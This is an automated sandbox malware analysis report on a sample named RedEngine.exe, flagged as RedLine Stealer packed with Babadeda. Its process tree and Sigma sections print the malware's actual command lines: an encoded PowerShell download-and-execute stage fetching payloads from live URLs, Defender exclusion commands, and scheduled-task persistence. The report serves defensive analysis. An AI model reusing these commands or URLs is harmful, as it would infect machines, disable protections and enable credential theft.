Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RedEngine.exe

Overview

General Information

Sample name:RedEngine.exe
Analysis ID:1504561
MD5:4fbb04c9e3aa983cbfc4980a7b5b7041
SHA1:34aeca658462e638521bc384a4935251678a9a78
SHA256:24f095f4f5796561cc9f9c60f71a2182fee89692f239c92e7447af3461e12731
Tags:exe
Infos:

Detection

Babadeda, RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (overwrites its own PE header)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule VBS From Appdata
Suricata IDS alerts for network traffic
Yara detected Babadeda
Yara detected Powershell download and execute
Yara detected RedLine Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Adds extensions / path to Windows Defender exclusion list
Command shell drops VBS files
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to infect the boot sector
Encrypted powershell cmdline option found
Found pyInstaller with non standard icon
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Potential dropper URLs found in powershell memory
Powershell drops PE file
Sigma detected: Net WebClient Casing Anomalies
Sigma detected: PowerShell DownloadFile
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to download and execute files (via powershell)
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
Very long command line found
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Installs a raw input device (often for capturing keystrokes)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Use Short Name Path in Command Line
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • RedEngine.exe (PID: 7660 cmdline: "C:\Users\user\Desktop\RedEngine.exe" MD5: 4FBB04C9E3AA983CBFC4980A7B5B7041)
    • powershell.exe (PID: 7768 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAbAB3ACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGEAdAByACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcARQByAHIAbwByACAAIwA4ADEAOQA6ACAAQwBhAG4AbgBvAHQAIABzAHQAYQByAHQAIABkAHUAZQAgAHQAbwAgAG0AaQBzAHMAaQBuAGcAIABkAGUAcABlAG4AZABlAG4AYwBpAGUAcwAsACAAcABsAGUAYQBzAGUAIABpAG4AcwB0AGEAbABsACAAYQBsAGwAIAB0AGgAZQAgAGQAZQBwAGUAbgBkAGUAbgBjAGkAZQBzACAAcgBlAHEAdQBpAHIAZQBkAC4AJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGIAcQBzACMAPgA7ACIAOwA8ACMAZQBtAHYAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB1AGoAZgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB1AHEAbQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB3AHcAeAAjAD4AOwAkAHcAYwAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQA7ACQAbABuAGsAIAA9ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGUAbgB0AHIAeQAuAG8AcgBnAC8AcABhAG4AYwBlAGsANgAxADEAMQAxADEAMQAxADEAMQAxADEAMQAxAC8AcgBhAHcAJwApAC4AUwBwAGwAaQB0ACgAWwBzAHQAcgBpAG4AZwBbAF0AXQAiAGAAcgBgAG4AIgAsACAAWwBTAHQAcgBpAG4AZwBTAHAAbABpAHQATwBwAHQAaQBvAG4AcwBdADoAOgBOAG8AbgBlACkAOwAgACQAZgBuACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEcAZQB0AFIAYQBuAGQAbwBtAEYAaQBsAGUATgBhAG0AZQAoACkAOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGwAbgBrAFsAJABpAF0ALAAgADwAIwBtAGMAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGoAbQBpACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGkAZwBuACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACkAIAB9ADwAIwB2AGkAeAAjAD4AOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB3AGUAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdgB2AHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAIAB9ACAAPAAjAHgAbABpACMAPgA=" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7968 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#atr#>[System.Windows.Forms.MessageBox]::Show('Error #819: Cannot start due to missing dependencies, please install all the dependencies required.','','OK','Error')<#bqs#>; MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • mgne4i3n.t1d0.exe (PID: 3024 cmdline: "C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exe" MD5: 6B1712C45B98661A7BDBC0E458660392)
        • conhost.exe (PID: 6616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • mgne4i3n.t1d1.exe (PID: 6160 cmdline: "C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe" MD5: 646A4B7082185499D3682C4FD27F44D0)
        • cmd.exe (PID: 968 cmdline: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\E8C.tmp\E8D.tmp\E8E.bat C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 1476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • chcp.com (PID: 7736 cmdline: chcp 1251 MD5: 33395C4732A49065EA72590B14B64F32)
          • findstr.exe (PID: 7780 cmdline: findstr /c:"127.0.0.1 store.steampowered.com" "C:\Windows\System32\drivers\etc\hosts" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
          • findstr.exe (PID: 7684 cmdline: findstr /c:"127.0.0.1 steamcommunity.com" "C:\Windows\System32\drivers\etc\hosts" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
          • findstr.exe (PID: 7696 cmdline: findstr /c:"127.0.0.1 help.steampowered.com" "C:\Windows\System32\drivers\etc\hosts" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
          • schtasks.exe (PID: 7764 cmdline: schtasks /query /tn "MyBatchScript" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7828 cmdline: schtasks /create /tn "MyBatchScript" /tr "\"C:\Users\user\AppData\Roaming\runHidden.vbs\"" /sc onlogon /rl highest /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • cmd.exe (PID: 4948 cmdline: C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • reg.exe (PID: 8052 cmdline: reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • cmd.exe (PID: 1916 cmdline: C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • reg.exe (PID: 368 cmdline: reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • powershell.exe (PID: 1316 cmdline: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/goodfuture91/goodfuture511/raw/64c80586bb78a4f95934a071956e2dccca8efe42/p.rar', 'C:\Users\user~1\AppData\Local\Temp\downloaded_archive.rar')" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • tasklist.exe (PID: 424 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
          • find.exe (PID: 6028 cmdline: find /i "tf_win64.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
          • taskkill.exe (PID: 8060 cmdline: taskkill /f /im tf_win64.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • tasklist.exe (PID: 4580 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
          • find.exe (PID: 4304 cmdline: find /i "dota2.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
          • taskkill.exe (PID: 3740 cmdline: taskkill /f /im dota2.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • tasklist.exe (PID: 5192 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
          • find.exe (PID: 5204 cmdline: find /i "cs2.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
          • taskkill.exe (PID: 7076 cmdline: taskkill /f /im cs2.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • tasklist.exe (PID: 5344 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
          • find.exe (PID: 6900 cmdline: find /i "RustClient.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
          • taskkill.exe (PID: 7356 cmdline: taskkill /f /im RustClient.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • tasklist.exe (PID: 7688 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
          • find.exe (PID: 4708 cmdline: find /i "GTA5.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
          • taskkill.exe (PID: 2468 cmdline: taskkill /f /im GTA5.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • tasklist.exe (PID: 4260 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • mgne4i3n.t1d2.exe (PID: 1548 cmdline: "C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe" MD5: BECE6335063D21401AA6A807202A201C)
        • mgne4i3n.t1d2.exe (PID: 2168 cmdline: "C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe" MD5: BECE6335063D21401AA6A807202A201C)
          • cmd.exe (PID: 4240 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 8044 cmdline: powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\user\AppData" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • powershell.exe (PID: 4232 cmdline: powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\user\Local" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • powershell.exe (PID: 4184 cmdline: powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • OpenWith.exe (PID: 576 cmdline: C:\Windows\system32\OpenWith.exe ""C:\Users\user\AppData\Roaming\runHidden.vbs"" MD5: E4A834784FA08C17D47A1E72429C5109)
  • svchost.exe (PID: 7972 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • clppth.exe (PID: 6828 cmdline: "C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe" MD5: BECE6335063D21401AA6A807202A201C)
    • clppth.exe (PID: 5896 cmdline: "C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe" MD5: BECE6335063D21401AA6A807202A201C)
  • clppth.exe (PID: 6000 cmdline: "C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe" MD5: BECE6335063D21401AA6A807202A201C)
    • clppth.exe (PID: 3364 cmdline: "C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe" MD5: BECE6335063D21401AA6A807202A201C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
BabadedaAccording to PCrisk, Babadeda is a new sample in the crypters family, allowing threat actors to encrypt and obfuscate the malicious samples. The obfuscation allows malware to bypass the majority of antivirus protections without triggering any alerts. According to the researchers analysis, Babadeda leverages a sophisticated and complex obfuscation that shows a very low detection rate by anti-virus engines.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.babadeda
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeJoeSecurity_BabadedaYara detected BabadedaJoe Security
    C:\Users\user\AppData\Local\Temp\E8C.tmp\E8D.tmp\E8E.batJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      0000000B.00000002.1678511629.0000000002471000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        Process Memory Space: powershell.exe PID: 7768JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          Process Memory Space: mgne4i3n.t1d0.exe PID: 3024JoeSecurity_RedLineYara detected RedLine StealerJoe Security
            Process Memory Space: mgne4i3n.t1d1.exe PID: 6160JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              Process Memory Space: powershell.exe PID: 1316JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                13.0.mgne4i3n.t1d1.exe.400000.0.unpackJoeSecurity_BabadedaYara detected BabadedaJoe Security
                  13.2.mgne4i3n.t1d1.exe.400000.0.unpackJoeSecurity_BabadedaYara detected BabadedaJoe Security

                    Other

                    SourceRuleDescriptionAuthorStrings
                    amsi64_7768.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                      amsi64_1316.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: Net WebClient Casing Anomalies
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAbAB3ACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGEAdAByACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcARQByAHIAbwByACAAIwA4ADEAOQA6ACAAQwBhAG4AbgBvAHQAIABzAHQAYQByAHQAIABkAHUAZQAgAHQAbwAgAG0AaQBzAHMAaQBuAGcAIABkAGUAcABlAG4AZABlAG4AYwBpAGUAcwAsACAAcABsAGUAYQBzAGUAIABpAG4AcwB0AGEAbABsACAAYQBsAGwAIAB0AGgAZQAgAGQAZQBwAGUAbgBkAGUAbgBjAGkAZQBzACAAcgBlAHEAdQBpAHIAZQBkAC4AJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGIAcQBzACMAPgA7ACIAOwA8ACMAZQBtAHYAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB1AGoAZgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB1AHEAbQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB3AHcAeAAjAD4AOwAkAHcAYwAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQA7ACQAbABuAGsAIAA9ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGUAbgB0AHIAeQAuAG8AcgBnAC8AcABhAG4AYwBlAGsANgAxADEAMQAxADEAMQAxADEAMQAxADEAMQAxAC8AcgBhAHcAJwApAC4AUwBwAGwAaQB0ACgAWwBzAHQAcgBpAG4AZwBbAF0AXQAiAGAAcgBgAG4AIgAsACAAWwBTAHQAcgBpAG4AZwBTAHAAbABpAHQATwBwAHQAaQBvAG4AcwBdADoAOgBOAG8AbgBlACkAOwAgACQAZgBuACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEcAZQB0AFIAYQBuAGQAbwBtAEYAaQBsAGUATgBhAG0AZQAoACkAOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGwAbgBrAFsAJABpAF0ALAAgADwAIwBtAGMAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGoAbQBpACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGkAZwBuACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACkAIAB9ADwAIwB2AGkAeAAjAD4AOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB3AGUAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdgB2AHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAIAB9ACAAPAAjAHgAbABpACMAPgA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAbAB3ACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGEAdAB
                        Sigma detected: PowerShell DownloadFile
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/goodfuture91/goodfuture511/raw/64c80586bb78a4f95934a071956e2dccca8efe42/p.rar', 'C:\Users\user~1\AppData\Local\Temp\downloaded_archive.rar')", CommandLine: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/goodfuture91/goodfuture511/raw/64c80586bb78a4f95934a071956e2dccca8efe42/p.rar', 'C:\Users\user~1\AppData\Local\Temp\downloaded_archive.rar')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\E8C.tmp\E8D.tmp\E8E.bat C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 968, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/goodfuture91/goodfuture511/raw/64c80586bb78a4f95934a071956e2dccca8efe42/p.rar', 'C:\Users\user~1\AppData\Local\Temp\downloaded_archive.rar')", ProcessId: 1316, ProcessName: powershell.exe
                        Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAbAB3ACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGEAdAByACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcARQByAHIAbwByACAAIwA4ADEAOQA6ACAAQwBhAG4AbgBvAHQAIABzAHQAYQByAHQAIABkAHUAZQAgAHQAbwAgAG0AaQBzAHMAaQBuAGcAIABkAGUAcABlAG4AZABlAG4AYwBpAGUAcwAsACAAcABsAGUAYQBzAGUAIABpAG4AcwB0AGEAbABsACAAYQBsAGwAIAB0AGgAZQAgAGQAZQBwAGUAbgBkAGUAbgBjAGkAZQBzACAAcgBlAHEAdQBpAHIAZQBkAC4AJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGIAcQBzACMAPgA7ACIAOwA8ACMAZQBtAHYAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB1AGoAZgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB1AHEAbQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB3AHcAeAAjAD4AOwAkAHcAYwAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQA7ACQAbABuAGsAIAA9ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGUAbgB0AHIAeQAuAG8AcgBnAC8AcABhAG4AYwBlAGsANgAxADEAMQAxADEAMQAxADEAMQAxADEAMQAxAC8AcgBhAHcAJwApAC4AUwBwAGwAaQB0ACgAWwBzAHQAcgBpAG4AZwBbAF0AXQAiAGAAcgBgAG4AIgAsACAAWwBTAH